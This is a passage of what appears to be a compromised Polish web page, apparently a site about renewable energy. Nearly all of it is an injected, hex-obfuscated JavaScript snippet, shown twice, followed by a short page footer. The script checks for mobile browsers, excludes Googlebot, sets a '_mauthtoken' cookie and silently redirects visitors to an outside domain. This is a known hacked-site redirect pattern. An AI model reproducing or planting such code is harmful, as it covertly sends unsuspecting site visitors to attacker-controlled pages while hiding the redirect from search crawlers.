os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
do góry

Energia odnawialna - nasz partner SWE